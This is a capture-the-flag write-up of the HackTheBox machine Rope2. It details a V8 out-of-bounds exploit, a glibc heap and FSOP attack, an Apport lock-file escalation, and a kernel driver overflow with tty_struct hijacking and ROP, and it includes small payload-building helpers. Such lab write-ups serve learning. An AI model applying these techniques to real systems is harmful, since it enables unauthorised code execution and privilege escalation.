Rope2 by R4J has been my favorite box on HackTheBox by far. It wasn't really related to pentesting, but was an immersive exploit dev experience, which is my favorite subject. To sum it up, this box was composed of a V8 Chromium pwnable and a difficult glibc heap (with FSOP) pwn for user, and then a heap pwn on a vulnerable kernel driver on Ubuntu 19.04. In the end, I also did end up taking second intended user and root blood, with both first intended bloods being claimed by Sampriti of course; macz also ended up taking third intended blood.
Before I start, I would like to acknowledge Hexabeast, who worked with me on the v8 pwnable. I would also like to thank Sampriti and my teammate cfaeb1d for briefly discussing the user pwnable with me.
Initial enumeration is quite obvious. An nmap scan shows ports 22, 5000, and 8000 open. Port 5000 hosts a gitlab instance, and exploring around (http://rope2.htb:5000/explore/projects/starred), you can see chromium source code, with a patch by the challenge author. Use the gitlab website to download the source code at its current commit: http://ropetwo.htb:5000/root/v8/commit/7410f6809dd33e317f11f39ceaebaba9a88ea970
Finding the bug is extremely easy. Take a look at the changed files in commit history. We notice that several files are changed, but the one that actually matters is builtin-arrays.cc. The other files were modified to properly introduce and incorporate the new function added in builtin-arrays.cc.
In ArrayGetLastElement, it is returning the value of the array at array[len], which is an OOB read. In ArraySetLastElement, it expects two arguments. The first argument will be the “this” argument and the second argument is the value, which the element at array[len] will be set to. This is an obvious OOB write. This seems quite similar to Faith's famous *CTF OOB writeup. One important thing to note here is that in December 2019, the V8 team introduced pointer compression to the V8 heap. Basically, it's a pretty smart memory saving decision; rather than storing 64 bit pointers on the heap, most of the pointers will be treated as 32 bit (with only the bottom half of the qword stored), while the upper 32 bits (also known as the isolate root) are stored in the r13 register.
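As a rough illustration of the pointer compression idea described above, here is a minimal Python sketch. The addresses are hypothetical values picked for illustration, and the sketch assumes the isolate root is 4 GB aligned so that adding the 32 bit offset is the same as filling in the low half.

```python
MASK32 = 0xFFFFFFFF

def compress(full_ptr: int) -> int:
    """Keep only the low 32 bits, which is what gets stored in a heap slot."""
    return full_ptr & MASK32

def decompress(isolate_root: int, compressed: int) -> int:
    """Rebuild the 64 bit address from the isolate root and a 32 bit slot.

    Assumes isolate_root is 4 GB aligned (its low 32 bits are zero).
    """
    return isolate_root + (compressed & MASK32)

# Hypothetical values, not taken from the box.
isolate_root = 0x0000123400000000
full_ptr = 0x000012340808CAD9

slot = compress(full_ptr)
print(hex(slot))                            # low half stored on the heap
print(hex(decompress(isolate_root, slot)))  # full pointer recovered
```

The takeaway for exploitation is that an OOB read of a heap slot only ever leaks the low half; the upper half never appears on the V8 heap.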
As mentioned earlier, the other files were just modified to support the addition of this new function for builtin arrays in V8.
typer.cc and bootstrapper.cc tell us that we can access these functions from builtin arrays with GetLastElement and SetLastElement.
For some reason, only the compiled Chromium was provided. There was neither a d8 release nor a d8 debug binary. The repo was also missing certain Chromium build scripts; however, once everything is fixed correctly, the build instructions Faith provided regarding Chromium Depot tools, gclient, v8gen.py, and ninja should suffice for both release and debug. To avoid dependency hell, I ended up rolling out an 18.04 docker to deal with the compilation (check out a commit near the date of the gitlab commit before the vulnerable patch, and then add the patch back in; I know some of my other teammates also managed to build it by slowly fixing the missing dependencies).
Before I start, I highly recommend you check out Faith's writeup or the famous Phrack paper, as those were the sources I relied heavily upon (my exploit is also very closely based upon Faith's). I'm still quite new to V8, so their explanations will probably be better, but the following is a summary of some important concepts I learned for personal notes.
In V8 heap, there are three main types: smi, pointers, and doubles. Doubles are 64 bits, pointers are compressed to 32 bits (and tagged), and smi are 32 bits as well (with their values doubled to differentiate them from pointers). There are also several important components to an object on the V8 heap (which you can see by running debug d8 with --allow-natives-syntax option). One should also note that Chromium uses a different allocator known as PartitionAlloc for most things, instead of glibc's allocator (which d8 uses).
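To make the tagging scheme above concrete, here is a small Python sketch of how a 32 bit slot can be classified. The helper names are my own, and it only handles non-negative smis for simplicity.

```python
def smi_encode(value: int) -> int:
    """A smi stores the value shifted left by one, so its low bit is 0."""
    return (value << 1) & 0xFFFFFFFF

def smi_decode(raw: int) -> int:
    """Undo the doubling (non-negative smis only in this sketch)."""
    return raw >> 1

def is_smi(raw: int) -> bool:
    return raw & 1 == 0

def is_heap_pointer(raw: int) -> bool:
    """Compressed heap pointers carry a tag in the low bit."""
    return raw & 1 == 1

def untag(raw: int) -> int:
    """Strip the tag to get the real (compressed) address."""
    return raw - 1

print(hex(smi_encode(2)))          # an array length of 2 as seen in memory
print(is_heap_pointer(0x0808CAD9)) # odd value, so it is a tagged pointer
print(hex(untag(0x0808CAD9)))
```

This is why lengths look doubled in a memory dump, and why every pointer you leak or forge is off by one from the real address.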
For every V8 object, there are several important pieces of data. Map is the most important; it is a pointer to data that contains type information. According to Phrack, data such as object size, element types, and prototype pointer is stored in the Map. The following is a list of element types (V8 currently has 21), but V8 mainly uses SMI_ELEMENTS, DOUBLE_ELEMENTS, and ELEMENTS (with each of them having the more efficient PACKED form and the more expensive HOLEY form). Another important piece of information is the elements (and properties) pointer, which points to a region that contains a pointer to another Map, a capacity size, and then the data/pointers indexed. Array objects also have an additional length field (lengths are represented as an smi).
Here is some sample output as an example for some of the terminology above (you can see how the fields are ordered from the debugging view as well):
Interesting to see how the double array's elements are usually above the object, which starts with the map field here... perhaps we can use the OOB to create some type confusion, as you will see later.
There are a few more important V8 exploitation concepts before we begin. In browser pwning, there are two basic types of primitives: addrof and fakeobj. Retrieving the address of an object is known as addrof. As Faith discusses, this can easily be done if you just create a type confusion of an object array into a double array, so its elements, which are pointers, get outputted as such. The other main type of primitive is the fakeobj primitive, where, as the name implies, you create fake objects in memory. As Faith discusses again, this can be achieved by just creating another type confusion of a double array into an object array, and writing pointers into the elements.
Using these two primitives, one can achieve arbitrary reads and writes. For arbitrary reads, we can make a double array where the first element contains a double array map, and then create a fake object over that field (making it think it's a double array). We can now manipulate the index which acts as the element pointer to be a valid address, and have it read its content from there by indexing into our fake object. Using this same concept, we can achieve an arbitrary write.
At this point, with all 4 of these primitives, we have enough to gain arbitrary code exec. Normally, Chromium runs under a sandbox that makes “arbitrary” not exactly true, but we don't have to worry about it here as it is disabled. The standard way in V8 exploitation is to use WASM instances. When you initialize a WebAssembly Instance, a new rwx page is mmap'd into V8 memory. Since this instance is also an object, you can leak its address. At Instance + 0x68, the rwx page address is stored in its 64 bit entirety, so you can use arbitrary read to read it out. Then you can write your own shellcode into the rwx region. Calling your exported Web Assembly function will now execute such shellcode. One might wonder why such an advanced software would be using an rwx page. Apparently, V8 devs pinpoint the issue on asm.js, which requires lazy compilation into Web Assembly, and the constant permission flips impact performance a lot.
However, how can you write into 64 bit addresses outside of the V8 heap when there is pointer compression and you can't control the isolate root? Basically, ArrayBuffer's backing store still stores the 64 bits in entirety as it references a region outside the V8 heap (since the backing store is allocated by ArrayBuffer::Allocator) as you can see in the image below.
If you change the backing store, you can now write to that arbitrary 64 bit address location (like in your WASM instance) with a DataView object initialized over your ArrayBuffer, since ArrayBuffers are low level raw binary buffers and only DataView (user specified types for values) or TypedArrays (uniform value access) can be used to interface with its contents. You can also perhaps find a stable way to leak a libc address as they do exist in the V8 heap (and V8 heap behaves predictably), and then choose to overwrite a hook function to another function or a stack pivot; do note that this success rate would work better inside d8 (since it uses glibc's allocator) than Chromium (which primarily relies on PartitionAlloc, but I believe glibc's allocator is still occasionally utilized).
Anyways, after the crash course above, let's begin discussing this exploit. Due to pointer compression, the OOB won't exactly be as easy as the one from *CTF (OOB behavior for double arrays will still behave the same). Notice how in the patch, builtin arrays are forcefully typecasted as 64 bit FixedDoubleArrays. If you have an array of objects, this forced typecasting groups 2 object pointers together as one double value each time while also retaining the same original length (but it'll also be indexed as a double array). For example, if you have an object array of size 2, typecasting this into a FixedDoubleArray makes it a FixedDoubleArray of size 2, which is equivalent to an object array of size 4, so indexing won't behave the same. If your object array is of size n, the OOB will access size n+1 from the FixedDoubleArray, which will be treated as the 2n+1 object array index.
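The index arithmetic above can be sketched in a few lines of Python. This is my own model of the layout, assuming 4 byte compressed slots and 8 byte doubles counted from the start of the element data; one double index then covers a pair of 32 bit slots.

```python
def slots_for_double_index(i: int) -> tuple:
    """A double at index i overlaps the 32 bit slots 2*i and 2*i + 1."""
    return (2 * i, 2 * i + 1)

def oob_slots(object_array_length: int) -> tuple:
    """GetLastElement/SetLastElement touch double index `length`,
    expressed here as 32 bit slot indices past the element data."""
    return slots_for_double_index(object_array_length)

for n in (1, 2):
    print(n, oob_slots(n))
```

For an object array of size 1 the OOB access lands on slots 2 and 3, and for size 2 on slots 4 and 5, so the access always ends at slot 2n+1.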
For example, if I declare a size 2 array of objects called temp, the following behavior occurs:
convertToHex(ftoi64(temp.GetLastElement())) outputs 0x40808cad9
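To read a leak like this one, it helps to split the 64 bit value into its two 32 bit halves. The sketch below uses Python analogues of the ftoi64 and itof helpers named above (the Python versions are mine, built on the struct module), and the interpretation of each half is an assumption based on the layout discussed earlier.

```python
import struct

def ftoi64(f: float) -> int:
    """Reinterpret the bits of a double as an unsigned 64 bit integer."""
    return struct.unpack("<Q", struct.pack("<d", f))[0]

def itof(i: int) -> float:
    """Reinterpret an unsigned 64 bit integer as a double."""
    return struct.unpack("<d", struct.pack("<Q", i))[0]

def split_halves(qword: int) -> tuple:
    """Return (low 32 bits, high 32 bits)."""
    return qword & 0xFFFFFFFF, qword >> 32

leak = 0x40808cad9
low, high = split_halves(leak)
print(hex(low))   # odd, so it looks like a tagged compressed pointer
print(hex(high))  # even, so it looks like a smi; high >> 1 is its value
```

Here the low half is 0x0808cad9 and the high half is 0x4, which decodes to the smi 2. That is consistent with the read landing on a compressed pointer followed by the length of a size 2 array.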
Running temp.SetLastElement(itof(0x13371337n)) causes the following behavior:
While this won't allow for a direct map overwrite and type confusion, we just have to take a longer route around it. For addrof, you can start off by creating an object array of size 1, and an object array of size 2 (that contains your target objects). You should also grab some other double array's map, and the second array's element pointer with OOB read. This way, when we perform an oob write on the first object array, it will hit the real index (in terms of 32 bit compressed object pointers) of 3 from its starting index, which would overwrite both its own properties and elements pointer. We can replace its elements pointer with the elements pointer of the second array, and just wipe out properties pointer since it won't matter for arrays that much. Now, when we try to OOB write on the first array, it will still see it as size of 1 double (effectively 2 object pointers due to typecasting), but use the elements of the second array. Since an effective size of 2 object elements is the correct size for this size 2 object array, we will hit the second array's map and properties. Properties once again doesn't matter, and you can just replace the map with the leaked double map from the OOB read. Now indexing into this second array will leak the target object's address.
The same concept is applied to fakeobj. However, this time we aren't changing the map of the second larger object array. Rather, we want to grab its map's value. Once we have that, we can normally OOB the float array and change its map to an object array's map, and retrieve fake objects. Here is my implementation:
Arbitrary read and write were already explained above. In this case, due to pointer compression, we need to set both a valid address for elements as well as the size (just choose any valid smi that's greater than or equal to size 1). I also subtracted another 0x8 from the address for the elements location, since pointer compression puts both the element's map and size in one single qword. Properties once again doesn't really matter, but the double array OOB leak handled it for us regardless so I just left it as that. As a setup for my WASM Instance, I just used Faith's implementation; due to pointer compression again, you will need to adjust for the offset of the backing store pointer. Here is the implementation so far.
And then we just need to trigger a WASM rwx page allocation, overwrite its code, and then execute the exported function. For my shellcode, I just chose a generic shellstorm x86_64 Linux reverse shell shellcode.
Here is my final exploit (note that it isn't 100%, probably due to some advanced garbage collector behavior or some other V8 internals that I don't understand):
Now we popped a shell as chrome user.
From a quick look at /etc/passwd, we know the user flag will be in r4j's home directory. Basic enumeration shows a suid binary from r4j called rshell. We can utilize this to escalate our privileges.
At this point during the release, only 3 players had popped a shell, and all of us were working towards user. This is when the A Team, per tradition, found an unintended route, and took first blood. Between the time this box was submitted and its release, 19.04 went EOL and was not patched, making it vulnerable to CVE-2020-8831. Basically, Apport will use the existing /var/lock/apport directory and create the lock file with world writeable permissions. Since Apport is enabled by default in modern Ubuntu, we just need to run a binary that purposely crashes. I know R4J and the A Team for their example crashed a binary named “fault” and then used the symlink to write a bash script into /etc/update-motd.d for privilege escalation (which will then be run as root on the next ssh connection):
Apparently several other boxes were vulnerable to the same bug...
For the sake of debugging (and since this is usually fine for many offsets), I patchelf'd the binary with the correct linker and libc, and re-merged debugging symbols into the library so I can properly debug with pwndbg.
Reversing the binary comes up with the following pseudocode:
Note that there is NX, Full RELRO, Canary, and PIE, and the libc version is 2.29. Basically, there is a file struct that holds the filename as a char array and the contents via a pointer. You only have 2 file spots, and you cannot have the same filenames (adding, removing, and editing are all done selectively by the filename). One issue is that there doesn't seem to be a good way to leak purely through the heap (the ls option only shows filenames, and nothing prints out file contents). Adding is quite safe (no overflows and etc.). Deleting is also safe, as the content pointer is nulled out. Edit also seems safe at first glance, but we must consider the behavior of realloc(). According to glibc source, realloc is as follows (__libc_realloc calls _int_realloc):
If the older chunk size is larger or equal to the requested chunk size, the chunk at that same memory location remains the same and it will attempt to split it. If it's large enough to be split into its own chunk, it'll get set up properly for it to be freed. Nothing would happen if you request a realloc() of the same size. By __libc_realloc, if the requested size is 0, then it just frees it and returns 0 (but that 0 is stored in a temporary value and by the program logic, won't replace the file content pointer).
If the older chunk size is smaller than the requested chunk size, it will first attempt to extend the current chunk into the top chunk. If it's not adjacent to wilderness, it will also try to extend to the next free chunk if possible and then deal with the split for remainder later (as when the older chunk size is larger or equal to the requested chunk size). Its last choice is to just allocate, memcpy, and then free the old chunk. Note that _int_malloc is used in this case, and like calloc, the code path taken in that function will not allocate from tcache to my knowledge.
The edit option only checks whether the size is less than or equal to 0x70. If we tell it to realloc with a size of 0, we can basically make it become a free. Since there is no check against a size of 0 (and the pointer remains there afterwards), we can use this to emulate a double free; this is the central bug.
But how can we grab a leak? Well, when analyzing libc offsets, we notice that _IO_2_1_stdout_ and main arena only differ in the last 2 bytes. We will always know the last 12 bits due to ASLR behavior, and there are only 4 bits we do not know. If we attack this file structure correctly, we can have every puts call print out large sections of the libc itself during runtime. Therefore, with a 4 bit bruteforce (1/16 rate of success), we might be able to redirect a heap chunk to that file structure, modify it, and dump portions of runtime addresses.
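The 1/16 figure falls out of a 2 byte partial overwrite: the low 12 bits are fixed by the page offset and only the top nibble of the second byte is a guess. A minimal sketch, where STDOUT_LOW12 is a hypothetical placeholder for the known low 12 bits of _IO_2_1_stdout_ in the target libc:

```python
import struct

STDOUT_LOW12 = 0x760  # hypothetical value; read the real one from the target libc

def partial_overwrite_candidates(low12: int) -> list:
    """All sixteen 2 byte little-endian values that share the known low 12 bits."""
    return [struct.pack("<H", (nibble << 12) | low12) for nibble in range(16)]

candidates = partial_overwrite_candidates(STDOUT_LOW12)
print(len(candidates))      # 16 possibilities
print(candidates[0].hex())  # the guess with the unknown nibble set to 0
```

In practice you pick one candidate and rerun the exploit until ASLR happens to match it, which takes 16 attempts on average.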
Our end goal is to have this file structure path end up at _IO_SYSWRITE in _IO_do_write. To hit _IO_do_write, we just need to skip the first two conditionals, and have our ch argument be EOF. The second argument is already set correctly from the call from _IO_new_file_xputn. To skip the first two conditions, we need to make sure to set the _IO_CURRENTLY_PUTTING flag and unset the _IO_NO_WRITES flag in the _flags field of the file structure. The following is _IO_do_write
To hit _IO_SYSWRITE, we want to set the _IO_IS_APPENDING flag in the file structure _flags field and make read_end different from write_base; this way, it won't take the lseek syscall path and return. Now, the _IO_SYSWRITE syscall writes (f->_IO_write_ptr - f->_IO_write_base) bytes starting from f->_IO_write_base.
To summarize, based on libio.h, we can set the flag as the following: (_IO_MAGIC | _IO_IS_APPENDING | _IO_CURRENTLY_PUTTING) & ~_IO_NO_WRITES. The value for the _flags field should be 0xfbad1800. The read field values won't really matter, so just set read_ptr, read_base, and read_end to null. And now, we can use a single byte to tamper with write_base, and hence have the syscall write dump memory for us.
I will now discuss the exploit itself below. A really high level of understanding of the glibc heap behavior is a must before reading. A lot of what I do is based on heap intuition and heap feng shui as the 2 chunk limit makes this extremely tough (in fact, after you leak, you will see that you only have one chunk left to use if you don't want the program to crash).
The first thing I did was store some chunks into the 0x60 and 0x80 tcachebins for usage after the leak. This is for when I corrupt the unsorted bin, I can still get valid chunks back. I then allocated a 0x40 user sized tcache chunk, filled it with 0x71 (for fake size metadata for later, this same technique will be applied later on to beat the many size checks in glibc), and then freed it (note that in my code, fakeedit basically just performs the edit with size 0).
Here is the current heap state:
Then I started using the 0x70 tcache chunk; I used the realloc size of 0 to double free and fill the tcache (note that we must wipe the key entry of each chunk to bypass the 2.29 tcache double free mitigation). Then I started pulling back from the 0x60 user sized tcache, and changed the fd pointer to redirect me into the region of 0x......370 later on in the diagram above.
On my next allocation from the 0x70 tcache, I will still have the original location. Due to the original successive double frees, the two chunks will be at the same location. I then use realloc behavior to split the second chunk into a 0x50 and 0x20 real sized chunk (0x20 chunk will be sent into tcache). I then fake edited the 0x50 chunk, then split the chunk into 0x20 and 0x30 sizes (with the 0x30 being sent into the tcache), and then freed the 0x20 size chunk. What's the purpose of this complex chain of events? Well, it is for me to corrupt the tcache bins so that multiple different tcache freelists have pointers to the same memory location. At this point, my first file content also points to this 0x......370 location.
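Since the distinction between user sizes and real chunk sizes matters a lot here, the following Python sketch models glibc's request2size and the shrink path of realloc on 64 bit. It is a simplified model (no top chunk or neighbor merging), and the request sizes in the example are my own choices that happen to produce the splits described above.

```python
SIZE_SZ = 8
MALLOC_ALIGN_MASK = 0xF
MINSIZE = 0x20

def request2size(req: int) -> int:
    """Real chunk size glibc uses for a user request of `req` bytes (x86_64)."""
    if req + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE:
        return MINSIZE
    return (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK

def realloc_shrink(old_size: int, req: int) -> tuple:
    """Model shrinking in place: returns (kept chunk size, freed remainder size).

    The remainder is only split off and freed if it is at least MINSIZE.
    """
    nb = request2size(req)
    remainder = old_size - nb
    if remainder < MINSIZE:
        return old_size, 0
    return nb, remainder

print(hex(request2size(0x40)))                        # 0x40 user size -> 0x50 chunk
print([hex(x) for x in realloc_shrink(0x70, 0x48)])   # 0x70 -> 0x50 kept, 0x20 freed
print([hex(x) for x in realloc_shrink(0x50, 0x18)])   # 0x50 -> 0x20 kept, 0x30 freed
```

Each freed remainder ends up in the tcache bin for its own size, which is how several bins end up holding pointers into the same region.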
Remember now, that our current file content (size of 0x70), and the first item on the freelist for the 0x20 and 0x50 tcache freelist all point to the same location. I then allocated a chunk (for the second filename) from the 0x70 tcache bin to change the size of current file content at 0x......390 to 0x91 (so once we fill the tcache of 0x90, we can get unsorted chunks instead of fast chunks). Note that you have to continually change the key structure in the “0x90” sized chunk to bypass the tcache double free mitigation, which I performed from the chunk allocated above as edit restricts us to not go over size of 0x70.
Now we can overlap tcache bins with unsorted bins, which, with a 4 bit bruteforce (1/16), lets us redirect a tcache chunk onto the _IO_2_1_stdout_ file structure. Here is where having tcache bins of different sizes point to the same location becomes useful. If we just double freed the same chunk, then we can't exactly retrieve the redirected chunk, since you can allocate and modify fd for the first file content spot, and then you need two more allocations to get back the target location (and that wouldn't be possible with realloc, free, and only 2 spots). Now, with my setup, I can use one of the tcache chunks (0x20) from one of the sizes to modify 2 bytes of the fd (with only the upper 4 bits being guessed), allocate once from the 0x50 chunk, then free the 0x20 chunk, and replace that spot with a 0x50 sized allocation, giving us control over the _IO_2_1_stdout_ file structure now. Now, when puts runs again, we should get a massive dump of data. Note that from this point on, my addresses will be different since I believe this technique is somewhat ASLR dependent, and using the non-ASLR addresses as the brute only worked locally. The code below will be the one adjusted for remote work, while the image will show the original local one without ASLR.
However, as a consequence of this leaking mechanism, there is no good metadata for us to use for the size field, and subsequent frees on this chunk will fail. This means we only have one chunk left to obtain RCE.
Our end goal should be to redirect a chunk into __free_hook to pop a shell. How do we do this with only 1 chunk remaining? After a bit of cleanup, I pulled from the previously saved 0x80 chunk (as unsorted bin is now corrupted). I then fake edited it, and then split it into an active 0x20 chunk and a freed 0x60 chunk. I then freed this 0x20 chunk so I can get another allocation from the previously freed 0x80 chunk. Using this, I can change the fd of the 0x60 chunk to __free_hook - 8.
After this point, we can free our chunk once again to get space for a new allocation. I can get the location of __free_hook - 8 back by allocating from 0x60 tcache once, splitting it, freeing it, and then allocating from it again. Then it's just a matter of overwriting it with /bin/sh\x00 and the address of system, and a subsequent free call will pop a shell.
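The reason for targeting __free_hook - 8 rather than __free_hook itself is that the same chunk can then hold both the command string and the hook value. A minimal sketch of that 16 byte payload, with a hypothetical system address:

```python
import struct

def free_hook_payload(system_addr: int) -> bytes:
    """Contents for a chunk that starts at __free_hook - 8.

    The first 8 bytes are the command string and the next 8 bytes
    overwrite __free_hook with the address of system.
    """
    return b"/bin/sh\x00" + struct.pack("<Q", system_addr)

# Hypothetical address; the real one comes from the libc leak.
payload = free_hook_payload(0x00007F1234567890)
print(payload.hex())
```

When the chunk is freed, the hook is called with the chunk pointer as its argument, so the call effectively becomes system("/bin/sh").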
Here is the final remote exploit:
Finally, we pop shell as R4J (remote 1/16 takes a few minutes):
However, we still weren't able to read the flag. It turns out that our group permissions were incorrect as we were still chromeuser group, but this is relatively trivial. newgrp - r4j will change our gid correctly, and we can grab the user flag.
Due to the nature of the box, I was 99% sure root was going to be a kernel pwn. Running dmesg showed us the following messages:
[ 20.879368] ralloc: loading out-of-tree module taints kernel.
[ 20.879407] ralloc: module verification failed: signature and/or required key missing - tainting kernel
This will probably be the vulnerable driver. Looking in /dev, there was a ralloc device loaded. The driver itself was located at /lib/modules/5.0.0-38-generic/kernel/drivers/ralloc/ralloc.ko. We can transfer that out and begin reversing. One thing to note is the current protections. From /proc/cpuinfo, we know SMEP is enabled, but surprisingly, R4J was very nice to disable KPTI and SMAP (although KPTI was originally enabled during testing, perhaps HackTheBox was running their servers on AMD Epyc and the whole issue KPTI was designed to address, Meltdown, wasn't an issue for AMD). KASLR will obviously be enabled, but check /proc/cmdline to be absolutely sure.
Reversing the kernel module comes up with the following pseudocode:
The bug is pretty clear here. When allocating from the ralloc ioctl, the size recorded in the global array for each entry is the requested size plus 0x20. This way, when you edit, you have a large kernel heap overflow. Deleting and reading are safe.
In order to even be able to debug this pwn efficiently, I had to use qemu so I can integrate it with peda remote debugging. I also must enable kvm, so I won't be stuck waiting 5 minutes for it to even boot. To set this up, I downloaded the 19.04 Ubuntu Server image and ensured the kernel version was the same (5.0.0-38-generic from enumeration). I then set up an image drive for this specifically for an install with the following commands:
qemu-img create -f qcow2 ralloc.qcow2 6G
qemu-system-x86_64 -hda ralloc.qcow2 -boot d -cdrom ./19.04.iso -m 2048 -nographic -enable-kvm
Then, to boot this kernel, I had to set the following flags:
I also added “console=ttyS0 loglevel=3 oops=panic panic=1 kaslr” into /etc/default/grub, ran update-grub, loaded ralloc.ko into “/lib/modules/`uname -r`/kernel/drivers/ralloc”, ran depmod, and then rebooted. We should now have a proper qemu debugging environment for which we can hook peda onto. It would also be helpful to retrieve the System Map file as well as vmlinuz.
With the size limitations above, the tty_struct from the kmalloc-1024 slab is perfect for this usage; it can give both a KASLR leak via ptm_unix98_ops and rip control with its pointer to the tty_operations struct, from which we can control the ioctl function pointer. Before discussing the exploit, I would like to briefly discuss some protections in standard Linux distro kernels (which are often compiled out for CTF kernel challenges). As this post from infosectbr mentions, freelist pointers are hardened in the following manner: ((unsigned long)ptr ^ s->random ^ ptr_addr). If we can get a heap leak, we can still perform freelist poisoning. Even if we don't get a heap leak, there is a chance to overwrite and corrupt it with only an 8 byte overflow to get it to redirect properly (as the article mentions), but a heap spray is necessary. It's just easier to rely on useful kernel structures (plus, there were even more pointer hardening options added soon afterwards in later kernel versions). Another hardening option is freelist randomization, which as the name implies, randomizes the freelist. This means our heap operations won't be predictable like in glibc, so a heap spray will be necessary.
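The freelist hardening formula above is just a three way XOR, so it can be modeled directly. The sketch below uses made up values for the per-cache secret and the addresses; it only shows why a heap leak (knowing ptr_addr) plus the secret is enough to forge a valid stored pointer.

```python
MASK64 = (1 << 64) - 1

def obfuscate(ptr: int, secret: int, ptr_addr: int) -> int:
    """What actually gets stored in the free object: ptr ^ s->random ^ ptr_addr."""
    return (ptr ^ secret ^ ptr_addr) & MASK64

def reveal(stored: int, secret: int, ptr_addr: int) -> int:
    """XOR is its own inverse, so decoding is the same operation."""
    return (stored ^ secret ^ ptr_addr) & MASK64

# Hypothetical values for illustration only.
secret = 0x1122334455667788
ptr_addr = 0xFFFF888012345400  # where the freelist pointer is stored
next_free = 0xFFFF888012345800 # the object it really points to

stored = obfuscate(next_free, secret, ptr_addr)
print(hex(stored))
print(hex(reveal(stored, secret, ptr_addr)))
```

Without either the secret or the storage address, a raw pointer written over the freelist entry decodes to garbage, which is why the exploit below leans on kernel structures instead.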
One of the first things in my kernel exploit are the helper functions and structs. I made the following:
As mentioned earlier, we will be relying on the tty_struct structure, which gets allocated whenever we open /dev/ptmx. According to source, the struct is as follows:
Therefore, the 4th qword of this holds the tty_operations struct pointer, which for ptmx devices, will contain the address of ptm_unix98_ops. According to the Ubuntu System-Image file, that address will have its lower 12 bits be 0x6a0; this will come in handy for the heap spray. From the source, the following is the tty_operations struct:
Hijacking the ioctl function pointer seems like a good idea, as it would trigger when we run ioctl with that fd.
For the spray, my plan was to just allocate a bunch of ptmx devices, and then loop through the array of 32 spots to allocate a ralloc chunk. After each allocation, I would check if it is adjacent to a ptmx device by performing an OOB read to see if there is a ptm_unix98_ops address (we have just enough of an OOB amount to hit that field of the structure). If that is the correct one, I will just return that index. Here is my implementation:
From there, we can rebase all the necessary addresses in the kernel we need for privilege escalation to uid 0.
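The check used during the spray and the rebasing step can be summarized with a little arithmetic. In this sketch the 0x6a0 low bits come from the System Map as noted above, while PTM_UNIX98_OPS_OFFSET and the leaked value are hypothetical placeholders; the real offsets have to be read from the target kernel's symbols.

```python
PTM_UNIX98_OPS_LOW12 = 0x6A0        # low 12 bits survive KASLR
PTM_UNIX98_OPS_OFFSET = 0x10AF6A0   # hypothetical offset from the kernel base

def looks_like_ptm_unix98_ops(qword: int) -> bool:
    """Heuristic used while spraying: kernel address with the expected low bits."""
    return (qword >> 32) == 0xFFFFFFFF and (qword & 0xFFF) == PTM_UNIX98_OPS_LOW12

def kernel_base_from_leak(leak: int) -> int:
    return leak - PTM_UNIX98_OPS_OFFSET

def rebase(kernel_base: int, symbol_offset: int) -> int:
    """Runtime address of any symbol, given its offset from the kernel base."""
    return kernel_base + symbol_offset

leak = 0xFFFFFFFF9F0AF6A0  # hypothetical value read out of an adjacent tty_struct
if looks_like_ptm_unix98_ops(leak):
    base = kernel_base_from_leak(leak)
    print(hex(base))
```

The same rebase helper then covers every gadget and function address the rop chain needs.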
Now we can replace the tty_operations struct pointer with our own malicious pointer with the OOB write. Take careful note to preserve the other addresses in this struct. I also spammed my malicious tty_operations struct with pty_close to prevent other crashes (it just helps fill it with valid pointers, and crashing won't really happen since ioctl is the only operation I am planning for it). I chose a stack pivot gadget that was xchg eax, esp (since the address of the function pointer will be in the rax register when I trigger the malicious ioctl). This also allows me to determine an absolute location to make my fake stack for the rop chain.
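The "absolute location" for the fake stack follows from how xchg eax, esp behaves: writing a 32 bit register zero-extends into the full register, so rsp becomes the low 32 bits of rax. A small sketch of that calculation, using a hypothetical gadget address:

```python
PAGE_SIZE = 0x1000

def pivot_target(gadget_addr: int) -> int:
    """Where rsp ends up after xchg eax, esp when rax holds the gadget address."""
    return gadget_addr & 0xFFFFFFFF

def mmap_base_for(addr: int) -> int:
    """Page aligned userland address to map so that `addr` is backed by memory."""
    return addr & ~(PAGE_SIZE - 1)

gadget = 0xFFFFFFFF8104E2AB  # hypothetical rebased address of the xchg gadget
fake_stack = pivot_target(gadget)
print(hex(fake_stack))                 # rop chain goes here
print(hex(mmap_base_for(fake_stack)))  # map at least this page from userland
```

Because SMAP is disabled, the kernel can happily use this userland mapping as its stack once the pivot fires.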
Here is what the corruption looks like in memory (first address is the location of the length 32 array in the driver):
As you can see, there is a userland pointer that replaced the tty_operations struct pointer.
Now what should my rop chain be like? There is only SMEP, so this should be quite trivial with a ret2usr or even without it. However, the one issue I kept running into was the inability to use certain syscalls upon the return to usermode (such as execve), and I do not enjoy having an exploit that doesn't give me an ability to pop a shell. For some reason, execve with either the iretq, sysretq, or other syscall trampolines would cause a kernel panic; maybe there is something I didn't clean up with the corruption created with the exploit, but I am not completely sure. In the end, I decided to just make my exploit make /usr/bin/dash a suid binary as root and then hang the kernel thread (for 49.7 days, which is long enough). The idea was to just run the following pseudocode:
Once we add the rop chain into the target location after the stack pivot, we can trigger the malicious rop chain and become root. While we don't know which ptmx fd is the adjacent chunk, we can just loop through all of them, and run ioctl on all of them. Note that this exploit has to be run asynchronously in bash due to the hanging.
The following is the final exploit:
And after compiling and transferring to remote... (note that you can access this driver as chromeuser as well):
Whew, and finally, we can obtain the root flag! It was a really fun journey, and definitely sparked my interest in learning more about kernel pwning (as my previous experience only involved solving kernel ROP challenges) and browser pwnables. Feel free to let me know if anything I explained is wrong or confusing (as this is quite a complex writeup), and I am 100% looking forwards to Rope3.
Acknowledgements: In addition to all the sources linked above, I would like to thank R4J, Faith, D3v17, and Overthink for giving this a read through and providing feedback to make the writeup even better.